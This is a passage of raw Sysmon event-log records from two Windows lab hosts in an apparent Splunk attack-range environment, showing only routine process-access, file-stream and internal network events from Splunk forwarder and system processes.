10:35:51.607{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214090Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:51.607{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214089Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:51.607{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214088Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:51.607{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214087Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:51.607{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-0E07-6216-F403-000000003902}516C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214086Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:51.607{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-0E07-6216-F403-000000003902}516C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214085Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:51.608{4F8D34B0-0E07-6216-F403-000000003902}516C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000214084Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:51.294{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0F7E7FB674C0F6A0A70FD3733EE95EB0,SHA256=C43F438145947A28A20809FAD2BF0274BEF42ACD51A7BF8C3C844722D3D686D7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284944Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:51.551{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F96400C9230BB435164D88F8575FF308,SHA256=6202642BF1F897D9A4703E7589D8EDBAB3F6C8C707DC213D25532527A450241E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214099Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:52.622{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E585F6E3B9FE3F74658462C1BAF89742,SHA256=0D2E289C7FA4BAC880920FC82FF5686D5354F3BAFE578A625FCAAECD2C43189B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214098Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:52.356{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EBF79B0AD30732255DAAD62187082926,SHA256=5F9F8592CD1D4A34934875B77DF2EBA905B120E9687B3E6354DA743CEFAAD042,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284945Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:52.567{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C5F6E6672796318DA0CB9064831192F7,SHA256=B0F0ECC683CB012A7EE937B06BCE43928BE6C45B19ABA1BB7C66EEBBFFA09AD0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284946Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:53.569{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=16158A008D97B8BF678061DD86591F4F,SHA256=9BBA95DD6427011C9B7219F3A77F9E3A4102B76020AFE627F02F4175E440A353,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214101Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:53.372{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=75CD4F00D8A708092D24ECE2FB6DA046,SHA256=3658CF398FA6BED5E82B6883ADA3393755FE90B3BAC4A000C81A45FD3EDDD1CC,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000214100Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:50.670{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51164-false10.0.1.12-8000- 23542300x8000000000000000284948Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:54.570{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4D59FDE8558FDDBFAE2F41AF77160145,SHA256=7A5D286528C272E7058CD991D2D86CE53EB02D48AA99176D975B3BD28EE3C175,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214102Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:54.435{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B32004D7EB1C05A23F66A0A9BD591521,SHA256=CD048DB57233C5610B923E3FEE6CFE0C29613507ECBAD10CA781AAFA3E91C5ED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284947Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:54.057{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\respondent-20220223083251-119MD5=A38EB58E8C6680789F1AEA0022EC0210,SHA256=7B5C3F2ACD9B17C99423AC4BB2B0CFD455B3A71F8C48567BF2A051FF8E6D4921,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284951Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:55.603{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BDBBEAE44697ED2BE353AA18665ED5E8,SHA256=1DB79C72CC11702EFD45D55DD7257E0A868A5B6062327446B0EB0C1227D5B3A9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214103Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:55.466{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=26FF80B779311F54AF9EC425D4A60A75,SHA256=1EB3D4501A6EB39D51C8D0CB483555A3FE5065105489756FCA37DA8ECA4F932C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000284950Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:52.716{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53216-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000284949Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:55.056{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\surveyor-20220223083249-120MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214104Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:56.481{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=948C5472B521C634FA876B552DD43C00,SHA256=151D76DDE5B784B2286E88568931C1FAD0EC7EEA2A532A8821161CFBCBA62C9A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284952Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:56.619{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=33BEE0FD95FA9CA05CB713C6EDDC5C42,SHA256=40D9867691142448507F647C2D47395C56575812B065D34C1B8D5F3CB836A597,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284953Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:57.635{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0F719D6A5281122436F6B01C5B0F97C2,SHA256=AA8B8FE11DFA42103BDE33ADAC0B46251D0C563F29A8E55EDF70000AEE5290D8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214105Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:57.497{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=72EDCCB3F107BA5C7D0F101158B23872,SHA256=837506850018266E3D53919D2B1614E10A19A50AC571662AD459EDE2D6585591,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284954Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:58.681{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A2E303F92389A2F1339F7E7F0E33BFCF,SHA256=DFBEEA1F158F5F9159A1324563E6EB2F380385356EB169B7B5EB8C0F87E4FCC6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214106Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:58.513{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6CFB0C67E22D27B48A88489BDA474481,SHA256=890F214E637F0BEDE30FAB29677BA0D68B94793BD5BCEF9D23FBEF27C821DFCA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284955Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:59.681{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3B6068CD883588B70BFF9F8FE6544993,SHA256=C0B9B72CBF62A03C26DFD29A08885C0FE5B768B7D0AFE75A54014FB20CE20D28,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214108Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:59.513{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B062B891EC8208953429EF1005271A9B,SHA256=E567A531DE870A0FA195B4B735088B4003F37EC78E1DD931CA7AD43A5E4D42BF,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000214107Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:56.576{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51165-false10.0.1.12-8000- 23542300x8000000000000000284957Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:00.697{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=018791C70111C94E2C08409AF0CD9B65,SHA256=1565CCB22776DCAE84D922772C2A6AE97D3A3CAA9A61E3BCC418076F45DD44CE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214109Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:00.591{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=18D63200558C53F7DE5BF6AD9C6C724C,SHA256=B78E28F6B836079416D1BFDFB5551897A864086D2B929D1CAEDEB06728678E42,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000284956Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:58.644{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53217-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000214110Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:01.809{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=698497F77C89357834EB8C437D401CE0,SHA256=27514D819432E5B2FC5D4469A488EC44B569CEFF5F6BFEBD8F868756B6945541,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284958Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:01.775{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CAC1ECFB3800E6C81A66EC8E8E081DF1,SHA256=E18871A2C71DEACD9A1762ED663D2793D2E2C1B9BA64069F1852E60333F9DD8D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284976Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:02.791{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0190B620A5DABE4012B4BABE3C95D633,SHA256=BF732F43EC01711D9B3C17CC1AF47A7DF99390D94CF584BBC8A6A46847980CEC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000284975Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:02.635{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-0E12-6216-9F04-000000003802}4144C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284974Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:02.635{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284973Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:02.635{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284972Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:02.635{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\W